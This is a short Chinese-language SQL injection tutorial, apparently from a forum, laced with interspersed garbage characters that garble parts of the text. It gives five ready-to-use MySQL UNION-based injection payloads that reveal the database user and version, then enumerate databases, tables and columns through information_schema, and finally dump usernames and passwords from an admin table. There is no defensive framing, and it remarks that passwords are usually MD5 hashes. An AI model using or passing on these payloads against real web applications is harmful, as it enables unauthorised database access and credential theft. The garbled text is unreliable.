9 B1 I3 n1 J% C8 I一.查看MYSQL基本信息(库名,版本,用户) 0 F5 s$ z0 {3 o7 C$ Z) c8 F& _, T5 O9 i' y! `
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* . b. k" V: {/ ^# p9 l7 J% t5 E- A8 H/ z, y
二.查数据库- A6 k" E' w5 R N( j" o
6 S2 A/ [' q) R1 }4 `and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*2 r" q9 j$ \6 A
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。 0 h, U( _0 V: u- F3 c- s ! N" F' E6 s# E( [) t# M三.暴表 & q2 s* r( S. m0 H0 Q! }. t- H& @2 F* h! ]" W f }5 p
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*, r3 O/ @& l' c N M* K. G
9 R- a+ S% R+ B7 y" t% ~4 Qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。 9 ?1 D' Z* c! W" l8 G 6 V' n! y5 k* H; z c四.暴字段' u8 j9 ?8 c; Y" a+ R; c" Z7 M
0 ]$ P. {! @; |# eand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*8 l/ V- j+ w0 _
) U8 s7 e3 _& F K1 J" Llimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。) V2 }$ r, p: b9 t1 G# v- u$ s
/ q$ D# N+ F6 h7 X3 \五.暴数据 " u! S& |+ j- {9 L4 u . V6 E8 ~! Z2 S$ k3 _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/* ( b- V9 O) t, ~1 n, T2 j 2 v3 Y; U+ D R2 Z* g8 N - q$ [0 ]6 h6 I. e这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 % I6 _$ q# V8 g4 n" F